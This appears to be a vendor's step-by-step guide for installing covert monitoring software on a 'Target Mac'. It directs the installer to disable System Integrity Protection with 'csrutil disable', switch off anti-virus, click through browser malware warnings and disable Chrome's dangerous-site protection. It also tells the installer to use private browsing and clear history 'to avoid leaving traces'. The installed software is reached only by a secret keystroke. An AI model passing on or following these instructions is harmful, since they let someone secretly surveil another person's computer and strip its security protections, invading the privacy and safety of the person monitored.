For El Capitan, Sierra, High Sierra and Mojave Systems With a Single Operating System
- Boot your Mac into Recovery mode:
Turn your Mac off completely. Then restart and hold down the Command ( ⌘ ) – R combination immediately upon hearing the startup chime. Hold these keys pressed until the Apple logo appears.If you have a Mac notebook, press the keys on its built-in keyboard because the Recovery Mode keystroke may not necessarily register on external or wireless keyboards. - Open Terminal From the Utilities menu, click Terminal.
- When the Terminal window appears, type in the following: csrutil disableThen press Enter.A message should appear to confirm the command was successfully processed. If there is any unexpected error, retype the command carefully and try again.

Prerequisites for All Users
- Ensure you have an Internet connection on the Target Mac computer.
- You will need your License Key to activate the software. You can find this in your dashboard from the License Profile section at the bottom of your Account menu page.
- Anti-virus software may prevent downloading or installing the application, due to the many processes being monitored. You may be prompted to manually allow the downloading and installation of Software, but some browsers or a/v software may not offer this option.
We strongly recommend temporarily turning off any anti-virus or security software until after Software for Desktop has been fully installed and it's system folders have been excluded from future anti-virus scanning. For detailed anti-virus instructions, see here.
- To avoid leaving traces of the installation, use Chrome's 'Incognito', Microsoft Edge's 'InPrivate', or Firefox's 'New Private Window' browsing option to avoid leaving cache or browser history of the download process.
Installation:

- To download from a web browser on the Target Mac, navigate here. Click to confirm you have a license, then click 'View All Software', and then the MAC OS X logo. Your download should then begin.
- Due to the nature of such monitoring software, extra steps might be required before the browser will allow the download.
- If you see a red page with various warnings, double check that you are clicking the download link directly from this document (not a bookmark), as the published location might have changed.
- If you still see a red page with warnings, click 'ignore', 'advanced', 'details', 'continue' or 'visit this site' from the options which allow you to continue.
- The download will begin immediately. You may be given a warning by your browser and prompted to confirm you wish to keep the file.
- If using the Chrome browser, download might be blocked unless one specific setting is unchecked.
If you have trouble downloading the file, click the Chrome menu icon in the upper right area of the browser (3 vertical dots), then click on Settings, and at the bottom of the settings page click 'show advanced settings'. Then under the Privacy section, UNCHECK 'Protect you and your device from dangerous sites'. After the file has been downloaded, turn this setting back on. - If using Firefox browser, after the download completes click on the Downloads menu bar icon, then right-click on the downloaded file at the top of the list, and from the right-click options click Unblock. You will be asked 'Are you sure you want to unblock this file?' Click Unblock Anyway. Now go back to the Downloads list and find the downloaded file completed and accessible.
- If using the Chrome browser, download might be blocked unless one specific setting is unchecked.
- Inside your downloads folder, double-click the installer package to get started.
- If you see the message below, click OK.
If you do NOT see this message, you can skip to Step 12 below. - Click SYSTEM PREFERENCES.
- Click SECURITY & PRIVACY.
- Click GENERAL.
- Click the padlock at the bottom corner of the window.
- Enter your administrator username and password when prompted, and then click UNLOCK.
- Click ANYWHERE, and when the dialog box appears click ALLOW FROM ANYWHERE.
- Click the padlock again to confirm the changes.
- Now go back to the download folder and double-click the file you downloaded to begin the installation.
- When the Install Wizard appears, click CONTINUE.
- Click CONTINUE again after you have read the license agreement.
- Click AGREE to accept the license agreement.
- Click INSTALL FOR ALL USERS OF THIS COMPUTER.
- Click CONTINUE.
- Click INSTALL to begin the installation.
- Type in your administrator username and password when asked.
- Click INSTALL SOFTWARE.
- Click CLOSE when the installation has completed.
- Hold down COMMAND + CONTROL + SHIFT with one hand on the keyboard, and type 900900900with the other.
The Software Maintenance screen will appear. Select Activate Now, and then click NEXT.Note: If you click ACTIVATE LATER, you can bring up the Activation screen again at any time by holding down COMMAND + CONTROL + SHIFT and typing 900900900 either directly onto the desktop or from any active application. - Enter your License Key and click ACTIVATE, then wait for the software to Activate.
Your License Key is found in your welcome email after purchase, or from your logged in dashboard Account menu > License Profile section. - At this point the software has been installed and Activation is completed. You can click OK.
Post-Install Cleanup
- After Software has been installed, you may want to delete the installation file you downloaded. If you used an 'incognito' or other private browsing mode to download the installation file, no browsing history should have been recorded. Otherwise you may want to delete your browser cache, URL and download history.
